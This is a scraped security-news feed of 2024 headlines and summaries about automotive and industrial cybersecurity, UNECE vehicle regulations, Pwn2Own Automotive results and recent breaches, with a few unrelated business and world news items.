      Integrating cybersecurity into vehicle design and manufacturing

      industry ciber
      2024-02-12 https://www.helpnetsecurity.com/2024/02/12/yaron-edan-ree-automotive-electric-vehicles-cybersecurity/

      In this Help Net Security interview, Yaron Edan, CISO at REE Automotive, discusses the cybersecurity landscape of the automotive industry, mainly focusing on electric and connected vehicles. Edan highlights the challenges of technological advancements and outlines strategies for automakers to address cyber threats effectively. Additionally, he emphasizes the importance of consumer awareness in ensuring vehicle security. Can you describe the state of cybersecurity in the automotive industry, especially in the context of electric and connected … More

      The post Integrating cybersecurity into vehicle design and manufacturing appeared first on Help Net Security.

      "

      Autosummary: Now that our vehicles are becoming increasingly connected to the internet, can go through Over-the-Air (OTA) updates, use remote management, contain Advanced Driver Assistance Systems (ADAS), and employ AI, the potential avenues for cyberattacks have expanded for threat actors to exploit in a significant way. Once an automaker is compliant with certain regulatory rules, they will then ask the regulatory bodies to come to conduct an onsite visit, where they conduct an audit for months at a time, trying to hack each layer they can and look for any areas of weakness, to identify what needs to be patched up. In this Help Net Security interview, Yaron Edan, CISO at REE Automotive, discusses the cybersecurity landscape of the automotive industry, mainly focusing on electric and connected vehicles. Implement strong network security measures, including firewalls, detection systems, and encryption, to monitor your network traffic for any anomalies regularly. "


      Trinidad and Tobago hit by mystery ship oil spill

      industry
      2024-02-11 https://www.bbc.co.uk/news/world-latin-america-68266339
      At least 15km (nine miles) of Tobago's coast is already affected after a mysterious ship overturned. "

      Autosummary: "


      Cybersecurity in the automotive industry: Ensuring compliance with UNECE regulations

      industry ciber
      2024-02-07 https://ics-cert.kaspersky.com/publications/cybersecurity-in-the-automotive-industry-ensuring-compliance-with-unece-regulations/
      What UN Regulations 155 and 156 require from vehicle manufacturers in reality, and how to ensure compliance with requirements and prepare for certification if necessary "

      Autosummary: The table below presents a list of vehicle categories covered by the requirements of UN Regulations 155 and 156:

      Vehicle category | Category description | Applicable requirements
      L6 | Four-wheeled vehicles with a mass not exceeding 350 kg, engine displacement of 50 cc or less, and maximum design speed of 45 km/h | UN 155, if the vehicle complies with Level 3 automation or higher
      L7 | Four-wheeled vehicles with a mass not exceeding 400 kg and maximum continuous rated power of no more than 15 kW | UN 155, if the vehicle complies with Level 3 automation or higher
      M | Vehicles with four or more wheels, designed to carry passengers | UN 155 and UN 156
      N | Vehicles with four or more wheels, designed to carry cargo | UN 155 and UN 156
      O | Trailers with at least one ECU | UN 155 and UN 156
      R | Agricultural trailers | UN 156
      S | Interchangeable towed agricultural and logging equipment | UN 156
      T | Any motorized, wheeled, or tracked agricultural equipment with at least two wheeled axles, capable of moving faster than 6 km/h | UN 156

      Starting in July 2024, UN Regulations 155 and 156 will become mandatory not only for new types of vehicles, but also for all new vehicles produced.
      The automotive industry has a geographically and hierarchically distributed and functionally complex supply chain that includes: the vehicle manufacturer itself (OEM – Original Equipment Manufacturer); suppliers of individual vehicle systems and modules (Tier 1 suppliers), such as the gearbox, infotainment module, or engine control unit; their suppliers that make the individual components of the systems and modules, for example, microcircuits, sensors, controllers, operating systems, bearings, actuators, etc. The broad range of functions (engine control, fuel system control, passenger safety, autopilot, infotainment system), architectures of communication interfaces used by individual components (CAN, LIN, Ethernet, Wi-Fi), and communication links with external services and entities (Bluetooth, Wi-Fi, LTE) create a huge cyberattack surface in vehicles. Risks for the manufacturer’s ICT infrastructure: A vehicle manufacturer is an industrial organization whose structure combines the ordinary ICT infrastructure of a back office, i.e., auxiliary and supporting business units (accounting department, legal department, logistical support for the office, etc.), with the infrastructure of the development unit, the production segment, and the servers of the supporting infrastructure. The consequences of a successful attack on a vehicle may include the theft or modification of data (personal data, payment information, and other user data), installation of malicious code/firmware, disruption or manipulation of individual vehicle functions, theft of the vehicle, physical damage to the vehicle, and injury or death of drivers, passengers, and pedestrians.
      Relevant cybersecurity risks: In the automotive industry, cybersecurity requirements apply at least to the following objects: the product itself – that is, the vehicle and its components; supporting infrastructure – for example, servers for updating the firmware of electronic control units (ECU); the manufacturer’s ICT infrastructure, whose security is important for the development, manufacture, and subsequent support of products; the supply chain of a vehicle’s individual electronic components and systems. Production phase: According to ISO 21434, when the production phase begins, it is necessary to analyze all production operations and develop a production control plan that includes: a description of the steps to implement the cybersecurity requirements for the production, operation and maintenance, and decommissioning phases (the standard combines these phases into a single post-development phase); a list of equipment and tools for the production phase; security controls to prevent unauthorized changes in production; procedures for evaluating the completeness of implementation and validating the security requirements for the production, operation and maintenance, and decommissioning phases. To maintain the cybersecurity of the vehicle, it is necessary to: monitor information about discovered vulnerabilities and changes in the threat landscape; establish security monitoring of the supporting infrastructure and incident response processes; establish monitoring of information about compromised suppliers and processes for responding to incidents involving supply chains and trusted (authorized) partners; rapidly respond to vulnerabilities, threats and incidents, including developing and installing patches, notifying users, and reassessing risks.
      The following are examples of attacks on supporting infrastructure: uploading and installing a fake update; uploading fake backup copies of data or configurations; sending illegitimate commands from an adversary’s C&C server to a vehicle; an attack on the servers of supporting infrastructure (for example, network management servers for charging stations) and the subsequent leaking of personal data and payment information; changes made while servicing a vehicle at an auto repair shop that result in a breach of security (configuration changes, deployment of a rootkit, etc.). To obtain them, a vehicle manufacturer must demonstrate that the organizational processes listed above comply with the following requirements as part of cybersecurity management and update management: threat assessment and risk analysis (TARA); continuous monitoring, incident detection and response; vulnerability management; component supply chain management and service management; security update management; notification of supervisory bodies regarding the results of cybersecurity monitoring, including any cyberattacks. Risks of attacks on supporting infrastructure can be minimized by implementing a proper network topology and segmentation, secure protocols for authentication, authorization, and data encryption, antivirus protection, procedures for controlling access to the system, vulnerability management, and incident monitoring and response.
      An acceptable option for implementing cybersecurity practices could be the following sequence of steps: establish a cybersecurity management system, i.e., develop and implement basic cybersecurity procedures and policies within the organization; develop a cybersecurity plan that defines the list of protective measures and stages for their implementation; secure the company’s ICT infrastructure by minimizing the risk of attacks on development departments and production sites; secure supporting infrastructure and external services by minimizing the risk of an attack on a vehicle under development or in use; ensure that the project lifecycle meets relevant cybersecurity requirements, from design and secure development to vehicle decommissioning and the recycling of individual components. Risk management for the manufacturer’s ICT infrastructure: When it comes to risk management for the ICT infrastructure, it should be kept in mind that the vehicle manufacturer needs to view the ICT infrastructure as the starting point of complex attacks whose ultimate target is the vehicle, supporting infrastructure, and the data of passengers and vehicle owners (individuals as well as legal entities). According to ISO 26262, the lifecycle of a vehicle project is divided into 5 phases (we will use this division, because the phases defined in ISO 26262 are more detailed than those in ISO 21434): concept phase; product development phase; production phase; operation and maintenance phase; end of cybersecurity support and decommissioning phase. Some functionality (monitoring, secure downloading and installation of updates, user/owner change scenarios, etc.) is implemented in the vehicle, and some is implemented in supporting infrastructure. Three phases are identified in the project lifecycle: the concept phase, the development phase (which includes cybersecurity development and validation) and the post-development phase (which includes production, operation, and maintenance, as well as the end of cybersecurity support and decommissioning). Requirements of UNECE and international standards: UN Regulations 155 and 156 contain top-level requirements that can be divided into two categories: process-oriented requirements, which have to do with security management at the level of the organization, and project-oriented requirements, which have to do with ensuring the security of everything being produced – whether the vehicles themselves or individual systems and components. "


      After FBI Takedown, KV-Botnet Operators Shift Tactics in Attempt to Bounce Back

      industry
      2024-02-07 https://thehackernews.com/2024/02/after-fbi-takedown-kv-botnet-operators.html
      The threat actors behind the KV-botnet made "behavioral changes" to the malicious network as U.S. law enforcement began issuing commands to neutralize the activity. KV-botnet is the name given to a network of compromised small office and home office (SOHO) routers and firewall devices across the world, with one specific cluster acting as a covert data transfer system for other Chinese "

      Autosummary: "We observed the KV-botnet operators begin to restructure, committing eight straight hours of activity on December 8, 2023, nearly ten hours of operations the following day on December 9, 2023, followed by one hour on December 11, 2023," Lumen said in a technical report shared with The Hacker News. "


      Microsoft Outlook December updates trigger ICS security alerts

      industry
      2024-02-05 https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-december-updates-trigger-ics-security-alerts/
      Microsoft is investigating an issue that triggers Outlook security alerts when trying to open .ICS calendar files after installing December 2023 Patch Tuesday Office security updates. [...] "

      Autosummary: "


      Iranian hackers breached Albania’s Institute of Statistics (INSTAT)

      industry
      2024-02-02 https://securityaffairs.com/158555/hacking/iranian-hackers-hit-albania-instat.html
      Albania’s Institute of Statistics (INSTAT) announced that it was targeted by a sophisticated cyberattack that affected some of its systems. A sophisticated cyberattack on Wednesday hit Albania’s Institute of Statistics (INSTAT). The institute confirmed that the attack affected some of its systems. Albania’s Institute of Statistics (INSTAT) promptly activated emergency protocols to respond to the […] "

      Autosummary: Albania's cyber agency AKCESK is now collaborating with state… — The Record From Recorded Future News (@TheRecord_Media) February 2, 2024 In December 2023, Albania’s National Authority for Electronic Certification and Cyber Security (AKCESK) revealed that cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania. Pierluigi Paganini February 02, 2024 Albania’s Institute of Statistics (INSTAT) announced that it was targeted by a sophisticated cyberattack that affected some of its systems. "


      Spotify"s content filter fails to block explicit lyrics in dozens of hits

      industry
      2024-02-01 https://www.bbc.co.uk/news/entertainment-arts-68126890?at_medium=RSS&at_campaign=KARANGA
      Fans are shown swear words and racial slurs in dozens of songs even when explicit content is blocked. "

      Autosummary: "


      Why the Right Metrics Matter When it Comes to Vulnerability Management

      exploits industry
      2024-02-01 https://thehackernews.com/2024/02/why-right-metrics-matter-when-it-comes.html
      How’s your vulnerability management program doing? Is it effective? A success? Let’s be honest, without the right metrics or analytics, how can you tell how well you’re doing, progressing, or if you’re getting ROI? If you’re not measuring, how do you know it’s working? And even if you are measuring, faulty reporting or focusing on the wrong metrics can create blind spots and make it harder to "

      Autosummary: This article will help you identify and define the key metrics that you need to track the state of your vulnerability management program and the progress you've made, so you can create audit-ready reports that: prove your security posture; meet vulnerability remediation SLAs and benchmarks; help pass audits and compliance; demonstrate ROI on security tools; simplify risk analysis; prioritize resource allocation. Why you need to measure vulnerability management: Metrics play a critical role in gauging the effectiveness of your vulnerability and attack surface management. Cyber hygiene, scan coverage, average time to fix, vulnerability severity, remediation rates, vulnerability exposure… the list is endless. When a new vulnerability that could critically affect your systems is identified, Intruder will automatically kick off a scan. Attack surface monitoring: This helps you see the percentage of assets that are protected across your attack surface, discovered or undiscovered. As your attack surface evolves, changes and grows over time, it's important to monitor any changes to what's covered and your IT environment, such as recently opened ports and services. "


      Spotify"s filter fails to block explicit lyrics

      industry
      2024-02-01 https://www.bbc.co.uk/news/entertainment-arts-68126890
      Fans are shown swear words and racial slurs in dozens of songs even when explicit content is blocked. "

      Autosummary: "


      Cybercriminals replace familiar tactics to exfiltrate sensitive data

      industry ciber
      2024-01-31 https://www.helpnetsecurity.com/2024/01/31/ransomware-attacks-changing-tactics/

      Ransomware attacks are increasing again as cybercriminals’ motivation shifts to data exfiltration, according to Delinea. The familiar tactics of crippling a company and holding it hostage have been replaced by new strategies that use stealth to exfiltrate private and sensitive data. Cybercriminals then frequently threaten to sell it to the highest bidder on the darknet or leverage it to reap a handsome cyber insurance payment. Ransomware on the rise Although not back at the levels … More

      The post Cybercriminals replace familiar tactics to exfiltrate sensitive data appeared first on Help Net Security.

      "

      Autosummary: Changing tactics in ransomware attacks As their main goals changed, cybercriminals modified their tactics and moved away from using email as a preferred attack vector (down from 52% to 37%), targeting cloud (44%) and compromised applications (39%) instead. "


      ICS and OT threat predictions for 2024

      industry
      2024-01-31 https://ics-cert.kaspersky.com/publications/ics-and-ot-threat-predictions-for-2024/
      Most of the described trends have been observed before. However, some of them have reached a critical mass of creeping changes, which could lead to a qualitative shift in the threat landscape "

      Autosummary: "


      VikingCloud THOR AI offers real-time interactive analytics

      industry
      2024-01-31 https://www.helpnetsecurity.com/2024/01/31/vikingcloud-thor-ai/

      VikingCloud announced THOR AI (Threat Hunting and Orchestrated Response), a generative AI-powered cybersecurity chatbot. The new complimentary cyber defense tool is designed to assist companies of all sizes find more vulnerabilities faster – before they become disruptive threats to their business. THOR AI is built on two recently filed patent-pending innovations for (1) THOR AI’s algorithms based on VikingCloud’s cybersecurity and compliance dataset, and (2) persona-based communications customization. The company currently has 28 granted patents. … More

      The post VikingCloud THOR AI offers real-time interactive analytics appeared first on Help Net Security.

      "

      Autosummary: Proprietary models will accurately identify the level of cybersecurity expertise of individual users, from non-existent to CISO-level capabilities – making the solution highly-adoptable, easy-to-use, and effective. "


      Experian Fraud Protect enables automotive dealers to detect and prevent fraud

      industry
      2024-01-31 https://www.helpnetsecurity.com/2024/01/31/experian-fraud-protect/

      With more of the vehicle buying journey shifting online and vehicle prices remaining at elevated levels, fraudsters are targeting the automotive industry at an increasing rate. To address the rising threat, Experian launched Fraud Protect, a web-based application that helps automotive dealers detect and prevent fraud while maintaining a positive shopping experience for the consumer. According to a recent Experian report, nearly 70% of businesses reported that fraud losses have increased in recent years. Among … More

      The post Experian Fraud Protect enables automotive dealers to detect and prevent fraud appeared first on Help Net Security.

      "

      Autosummary: "


      HaystackID enhances Protect Analytics AI Suite to strengthen data analysis

      industry
      2024-01-30 https://www.helpnetsecurity.com/2024/01/30/haystackid-protect-analytics-ai-suite/

      HaystackID announced the expansion of its Protect Analytics AI Suite of AI enabled services designed to enhance the efficiency and effectiveness of identifying, analyzing, and reporting on sensitive information within large, unstructured datasets. The enhanced suite featuring Protect Analytics AI – Sensitive Data Identification, Protect Analytics AI – Entity Extraction, and Protect Analytics AI – Deploy continues to transform cybersecurity-centric incident responses, breach investigations, and notification actions by decreasing time to precision insight and action … More

      The post HaystackID enhances Protect Analytics AI Suite to strengthen data analysis appeared first on Help Net Security.

      "

      Autosummary: Key cross-functional features of the Protect Analytics AI Suite, enabled through a combination of custom development and multimodal integration of best-of-breed AI and large language model (LLM) tools, include: Interactive visualizations: Through integration with tools like Microsoft Power BI, the suite provides interactive data visualizations, enabling users to sort, query, and analyze sensitive data swiftly and effectively. "


      US threatens to reimpose sanctions on Venezuelan oil sector

      industry
      2024-01-30 https://www.bbc.co.uk/news/world-latin-america-68139518?at_medium=RSS&at_campaign=KARANGA
      The move comes after Venezuela's Supreme Court upheld a ban on the main opposition candidate. "

      Autosummary: "


      US threatens to reimpose oil sanctions on Venezuela

      industry
      2024-01-30 https://www.bbc.co.uk/news/world-latin-america-68139518
      The move comes after Venezuela's Supreme Court upheld a ban on the main opposition candidate. "

      Autosummary: "


      India"s ancient carpet weaving industry meets AI

      industry
      2024-01-30 https://www.bbc.co.uk/news/business-67650613
      Kashmir"s handmade carpet industry is trying to maintain its traditions while staying competitive. "

      Autosummary: "


      Energy giant Schneider Electric hit by Cactus ransomware attack

      exploits ransomware industry
      2024-01-29 https://www.bleepingcomputer.com/news/security/energy-giant-schneider-electric-hit-by-cactus-ransomware-attack/
      Energy management and automation giant Schneider Electric suffered a Cactus ransomware attack leading to the theft of corporate data, according to people familiar with the matter. [...] "

      Autosummary: Outage message on Schneider Electric's Resource Advisor platform. Source: BleepingComputer. Customers of Schneider Electric's Sustainability Business division include Allegiant Travel Company, Clorox, DHL, DuPont, Hilton, Lexmark, PepsiCo, and Walmart. Like all ransomware operations, the threat actors will breach corporate networks through purchased credentials, partnerships with malware distributors, phishing attacks, or by exploiting vulnerabilities. "


      Participants earned more than $1.3M at the Pwn2Own Automotive competition

      industry
      2024-01-27 https://securityaffairs.com/158202/hacking/pwn2own-automotive-day-three.html
      Bug bounty hunters earned more than $1.3 million for hacking Teslas, infotainment systems, and electric vehicle chargers at the Pwn2Own Automotive competition. The Zero Day Initiative’s Pwn2Own Automotive competition has ended; participants demonstrated 49 zero-day vulnerabilities affecting automotive products, earning a total of $1,323,750. The amazing Synacktiv team won the competition and earned a total […] "

      Autosummary: Participants earned more than $1.3M at the Pwn2Own Automotive competition Pierluigi Paganini January 27, 2024 Bug bounty hunters earned more than $1.3 million for hacking Teslas, infotainment systems, and electric vehicle chargers at the Pwn2Own Automotive competition. "


      Emerging trends and strategies in digital forensics

      industry
      2024-01-26 https://www.helpnetsecurity.com/2024/01/26/amber-schroader-paraben-digital-forensics-trends/

      In this Help Net Security interview, Amber Schroader, CEO at Paraben Corporation, discusses the challenges posed by the complexity of modern computer systems and networks on digital evidence collection. Schroader talks about the impact of exponential data growth on forensic practices, the role of AI in optimizing investigations, and emphasizes the need for professionals to adapt to the changing dynamics of digital investigations, along with cross-education in related fields. How has the complexity of modern … More

      The post Emerging trends and strategies in digital forensics appeared first on Help Net Security.

      "

      Autosummary: Schroader talks about the impact of exponential data growth on forensic practices, the role of AI in optimizing investigations, and emphasizes the need for professionals to adapt to the changing dynamics of digital investigations, along with cross-education in related fields. The cross-sharing of app data and just data, in general, has been streamlined, and our investigative scope is changing as well. "


      Pwn2Own Automotive 2024 Day 2 – Tesla hacked again

      industry
      2024-01-26 https://securityaffairs.com/158141/hacking/pwn2own-automotive-2024-day-two.html
      Researchers hacked the Tesla infotainment system and found 24 zero-days on day 2 of the Pwn2Own Automotive 2024 hacking competition. White hat hackers from the Synacktiv Team (@Synacktiv) compromised the Tesla infotainment system on the second day of the Pwn2Own Automotive 2024 hacking competition. The bug hunters chained two vulnerabilities to hack the Tesla infotainment system, […] "

      Autosummary: Pwn2Own Automotive 2024 Day 2 – Tesla hacked again Pierluigi Paganini January 26, 2024 Researchers hacked the Tesla infotainment system and found 24 zero-days on day 2 of the Pwn2Own Automotive 2024 hacking competition. "


      Pwn2Own Automotive: $1.3M for 49 zero-days, Tesla hacked twice

      exploits industry
      2024-01-26 https://www.bleepingcomputer.com/news/security/pwn2own-automotive-13m-for-49-zero-days-tesla-hacked-twice/
      The first edition of Pwn2Own Automotive has ended with competitors earning $1,323,750 for hacking Tesla twice and demoing 49 zero-day bugs in multiple electric car systems between January 24 and January 26. [...] "

      Autosummary: "


      New CherryLoader Malware Mimics CherryTree to Deploy PrivEsc Exploits

      exploits industry
      2024-01-25 https://thehackernews.com/2024/01/new-cherryloader-malware-mimics.html
      A new Go-based malware loader called CherryLoader has been discovered by threat hunters in the wild to deliver additional payloads onto compromised hosts for follow-on exploitation. Arctic Wolf Labs, which discovered the new attack tool in two recent intrusions, said the loader's icon and name masquerade as the legitimate CherryTree note-taking application to dupe potential victims "

      Autosummary: "


      Tesla hacked, 24 zero-days demoed at Pwn2Own Automotive 2024

      exploits industry
      2024-01-24 https://www.bleepingcomputer.com/news/security/tesla-hacked-24-zero-days-demoed-at-pwn2own-automotive-2024/
      Security researchers hacked a Tesla Modem and collected awards of $722,500 on the first day of Pwn2Own Automotive 2024 for three bug collisions and 24 unique zero-day exploits. [...] "

      Autosummary: "


      Tencent"s Riot Games cuts 11% of global workforce

      industry
      2024-01-23 https://www.bbc.co.uk/news/business-68064952?at_medium=RSS&at_campaign=KARANGA
      Riot Games is the latest to cut jobs in the gaming industry after Amazon, ByteDance and Epic Games. "

      Autosummary: "


      Swimlane enhances Turbine platform to alleviate the pressure on SecOps teams

      industry
      2024-01-18 https://www.helpnetsecurity.com/2024/01/18/swimlane-turbine-platform/

      Swimlane announced its new Turbine innovations, Canvas and Hero AI. This transformative combination empowers security teams to build automation in seconds with limitless integration possibilities, leading to dramatic time and resource savings. SecOps teams are drowning in a sea of alerts and evolving threats while facing a chronic shortage of qualified staff. This critical gap leaves organizations dangerously exposed as adversaries evolve their tactics and accelerate their attacks. Recognizing this urgent need, Swimlane has revolutionized … More

      The post Swimlane enhances Turbine platform to alleviate the pressure on SecOps teams appeared first on Help Net Security.

      "

      Autosummary: Text-to-Code ChatBot: Low-code solutions allow analysts to build use cases in a no-code fashion, but for power users and real-time security operations, a snippet of code might be urgently needed. Everyone needs a hero: Bringing together humans, automation, and AI to elevate security operations. Hero AI, Swimlane’s collection of AI-enabled innovations, enhances the automation solutions available for the Swimlane Turbine platform. Recognizing this urgent need, Swimlane has revolutionized its Turbine low-code automation platform with advancements that strengthen security teams by connecting them, their telemetry, and technology through a human-centric AI and automation building experience. "


      Industrial Defender collaborates with Dragos to enhance outcomes for OT operators

      industry
      2024-01-17 https://www.helpnetsecurity.com/2024/01/17/industrial-defender-dragos-partnership/

      Industrial Defender announced a strategic technology partnership with Dragos. The collaboration between these leaders in OT cybersecurity integrates their respective platform capabilities, representing a major move towards combining their leading strengths to enhance outcomes for OT operators. The partnership is centered around the shared goal of enhancing the security and resilience of critical infrastructure and manufacturing facilities. The intent of this collaboration is to bring together the unique strengths of both Industrial Defender and Dragos. … More

      The post Industrial Defender collaborates with Dragos to enhance outcomes for OT operators appeared first on Help Net Security.

      "

      Autosummary: “Industrial Defender’s longstanding expertise in ICS/OT security is well-recognized in operational environments,” said Matt Cowell, Global VP of Business Development, Dragos. "


      Tsurugi Linux: Tailoring user experience for digital forensics and OSINT investigations

      industry Linux
      2024-01-16 https://www.helpnetsecurity.com/2024/01/16/tsurugi-linux-open-source-dfir-analysis/

      Tsurugi Linux is a heavily customized open-source distribution focused on supporting DFIR investigations. The project focuses mainly on live forensics analysis, post-mortem analysis, and digital evidence acquisition. Users can also perform malware analysis, OSINT and computer vision activities. “We’ve crafted a user-friendly experience, organizing the main menu in a logical forensic analysis sequence. Our menu is your roadmap from device acquisition to integrity checks, artifact extraction, and reporting tools. It’s not just about familiarity; it’s … More

      The post Tsurugi Linux: Tailoring user experience for digital forensics and OSINT investigations appeared first on Help Net Security.

      "

      Autosummary: And for the seasoned experts, every tool is at your fingertips, ready to be wielded precisely through the command line console,” Giovanni Rattaro, Tsurugi Linux core developer, told Help Net Security.


      DDoS Attacks on the Environmental Services Industry Surge by 61,839% in 2023

      industry
      2024-01-15 https://thehackernews.com/2024/01/ddos-attacks-on-environmental-services.html
      The environmental services industry witnessed an “unprecedented surge” in HTTP-based distributed denial-of-service (DDoS) attacks, accounting for half of all its HTTP traffic. This marks a 61,839% increase in DDoS attack traffic year-over-year, web infrastructure and security company Cloudflare said in its DDoS threat report for 2023 Q4 published last week. “This surge in cyber attacks coincided

      Autosummary: Akamai, which also published its own retrospective on DDoS trends in 2023, said "DDoS attacks became more frequent, longer, highly sophisticated (with multiple vectors), and focused on horizontal targets (attacking multiple IP destinations in the same attack event)."


      US court docs expose fake antivirus renewal phishing tactics

      financial industry
      2024-01-15 https://www.bleepingcomputer.com/news/security/us-court-docs-expose-fake-antivirus-renewal-phishing-tactics/
      In a seizure warrant application, the U.S. Secret Service sheds light on how threat actors stole $34,000 using fake antivirus renewal subscription emails. [...]

      Autosummary: The victim calls the phone number listed on the email, and from there, the scammers direct them to perform various actions such as installing remote access software on their computers, infecting themselves with malware, and entering their account credentials on a phishing page.


      New Findings Challenge Attribution in Denmark's Energy Sector Cyberattacks

      industry ciber
      2024-01-14 https://thehackernews.com/2024/01/new-findings-challenge-attribution-in.html
      The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a


      Attacks against Denmark's energy sector were not carried out by Russia-linked APT

      industry
      2024-01-14 https://securityaffairs.com/157438/hacking/denmark-energy-sector-attacks-attribution.html
      Forescout experts questioned the attribution of cyber attacks that targeted the energy sector in Denmark in 2023 to the Russia-linked Sandworm. Forescout experts shared findings from their analysis of the cyber attacks that targeted the energy sector in Denmark in 2023, attributing them to the Russia-linked Sandworm. In May, Danish critical infrastructure faced the biggest […]

      Autosummary: Below is the Cyber Kill Chain for the overall attack described in the report. “To this day, there is no clear explanation of how the attackers had the necessary information, but we can state that among the 300 members, they did not miss a single shot,” continues the report. On April 25, 2023, Zyxel disclosed a critical vulnerability (CVSS score 9.8), tracked as CVE-2023-28771, in a number of their firewalls.


      Embracing offensive cybersecurity tactics for defense against dynamic threats

      industry ciber
      2024-01-11 https://www.helpnetsecurity.com/2024/01/11/alexander-hagenah-offensive-cybersecurity-measures/

      In this Help Net Security interview, Alexander Hagenah, Head of Cyber Controls at SIX, discusses the critical steps in creating effective offensive security operations and their impact on organizational security strategies. What are the critical steps in creating effective offensive security operations, and how do they impact an organization’s security strategy? The art of war in cybersecurity, much like Sun Tzu’s teachings, hinges on knowing the enemy. But it’s not just about knowing – it’s about … More

      The post Embracing offensive cybersecurity tactics for defense against dynamic threats appeared first on Help Net Security.

      "

      Autosummary: In this Help Net Security interview, Alexander Hagenah, Head of Cyber Controls at SIX, discusses the critical steps in creating effective offensive security operations and their impact on organizational security strategies. While it’s challenging to match their resources, focusing on agility, smart intelligence gathering, and collaborative defense strategies can provide effective countermeasures. By pooling resources, knowledge, and intelligence, a coalition approach facilitates a more comprehensive and effective response to cyber threats.


      The power of basics in 2024’s cybersecurity strategies

      industry ciber
      2024-01-10 https://www.helpnetsecurity.com/2024/01/10/cyber-defense-basics-video/

      In this Help Net Security video, Nick Carroll, Cyber Incident Response Manager at Raytheon, discusses how while organizations will be challenged to strengthen their defenses faster than cyber threats are evolving, this ‘come from behind’ rush to keep pace with attackers can often lead to the harmful practice of organizations skipping the foundational basics of cyber defense and failing to establish a general sense of cyber awareness within the business.

      The post The power of basics in 2024’s cybersecurity strategies appeared first on Help Net Security.

      "


      Attackers could use vulnerabilities in Bosch Rexroth nutrunners to disrupt automotive production

      industry
      2024-01-09 https://www.helpnetsecurity.com/2024/01/09/vulnerabilities-bosch-rexroth/

      Researchers have discovered over two dozen vulnerabilities in “smart” cordless nutrunners (i.e., pneumatic torque wrenches) manufactured by Bosch Rexroth that could be exploited to make the devices inoperable or their output unreliable. “Depending on a manufacturer’s use and business configuration, devices such as the nutrunner may form a critical part of the quality management and assurance program in an enterprise, possibly even the last line of quality assurance. Compromise of the integrity in this final … More

      The post Attackers could use vulnerabilities in Bosch Rexroth nutrunners to disrupt automotive production appeared first on Help Net Security.

      "

      Autosummary: After probing the security posture of the Bosch Rexroth NXA015S-36V-B nutrunner and discovering 25 vulnerabilities affecting the device’s management web application and the services parsing communications protocols, the researchers successfully tested two attack scenarios in their lab: deployment of custom ransomware (specifically designed for the devices’ OS), and stealthy alteration of tightening programs (while manipulating the onboard display). “We were able to make the device completely inoperable by preventing a local operator from controlling the drill through the onboard display and disabling the trigger button.


      Industrial Defender Risk Signal integrates threat intelligence and business context

      industry
      2024-01-04 https://www.helpnetsecurity.com/2024/01/04/industrial-defender-risk-signal/

      Industrial Defender introduced Industrial Defender Risk Signal, its new risk-based vulnerability management (RBVM) solution. Building upon the company’s robust vulnerability assessment capabilities, Industrial Defender Risk Signal intelligently prioritizes vulnerability for highest impact, integrating threat intelligence and the user’s specific business context. Industrial Defender’s RBVM solution enables a significant evolution in vulnerability management for industrial environments. With enriched insights into which vulnerabilities matter most to the user’s specific operations, security teams can use Industrial Defender Risk … More

      The post Industrial Defender Risk Signal integrates threat intelligence and business context appeared first on Help Net Security.

      "


      UAC-0050 Group Using New Phishing Tactics to Distribute Remcos RAT

      financial industry
      2024-01-04 https://thehackernews.com/2024/01/uac-0050-group-using-new-phishing.html
      The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software. "The group's weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in


      Key cybersecurity skills gap statistics you should be aware of

      industry ciber
      2024-01-02 https://www.helpnetsecurity.com/2024/01/02/cybersecurity-skills-gap-statistics/

      As the sophistication and frequency of cyber threats continue to escalate, the demand for skilled cybersecurity professionals has never been bigger. The skills gap is not merely a statistical discrepancy; it represents a substantial vulnerability in the defense mechanisms of businesses and institutions. From the shortage of experts in critical areas such as penetration testing and threat analysis to the broader issues of workforce diversity and continuous skill development, the problems contributing to this gap … More

      The post Key cybersecurity skills gap statistics you should be aware of appeared first on Help Net Security.

      "

      Autosummary: Soft skills continue to challenge the cybersecurity sector. When looking at soft skills, communication (58%), critical thinking (54%), problem-solving (49%), teamwork (45%), and attention to detail (36%) come in as the top five skills employers are seeking in cybersecurity job candidates.


      Hackers employ nuanced tactics to evade detection

      industry
      2024-01-02 https://www.helpnetsecurity.com/2024/01/02/2023-holiday-attacks/

      Threat actors evolved tactics, opting for a more nuanced approach that spread attacks across a broader timeframe to blend in with legitimate traffic and evade detection during peak holiday shopping times, according to Cequence Security. The 2023 holiday season unveiled alarming realities: the months before the 2023 holidays demonstrated a change in tactics, techniques, and procedures by adversaries against prominent retailers. Attackers have shown that they are highly sophisticated and have great persistence and depth of … More

      The post Hackers employ nuanced tactics to evade detection appeared first on Help Net Security.

      "

      Autosummary: In the second half of 2023 alone, gift card fraud increased by 110%, while scraping, loyalty card fraud and payment card fraud increased by a collective average of over 700% as attackers lay the groundwork for holiday sale attacks ahead of retailer security crackdowns.


      Wi-Fi 7’s mission-critical role in enterprise, industrial networking

      industry
      2024-01-02 https://www.helpnetsecurity.com/2024/01/02/tiago-rodrigues-wireless-broadband-alliance-wi-fi-7-networks/

      As we transition from Wi-Fi 6 to the more advanced Wi-Fi 7, we uncover the significant enhancements in speed, efficiency, and spectrum usage that set it apart from its predecessors. In this Help Net Security interview, Tiago Rodrigues, CEO at Wireless Broadband Alliance, discusses the transformative world of Wi-Fi 7, exploring its features and the impact it promises to have on our digital landscape. Rodrigues examines the crucial role of AI and machine learning in … More

      The post Wi-Fi 7’s mission-critical role in enterprise, industrial networking appeared first on Help Net Security.

      "

      Autosummary: We expect network executives will continue deploying Wi-Fi and cellular in the coming years, with Wi-Fi 6E/7 for indoor, on-campus, and fixed network situations and 5G/cellular for outdoor, off-campus, and fast-mobility environments. Wi-Fi 7 will enable consumer, enterprise, Industry 4.0, medical, smart city and other applications that are impractical or impossible with other wired and wireless technologies, providing twice the bandwidth of Wi-Fi 6 and providing features such as deterministic network support. Wi-Fi 6, 6E and 7 topped the list of wireless technologies that network operators, ISPs, device and chipset vendors, enterprises and other companies plan to deploy by the end of 2024, in our latest cross-industry report.


      Argentina pulls out of plans to join Brics bloc

      latam industry
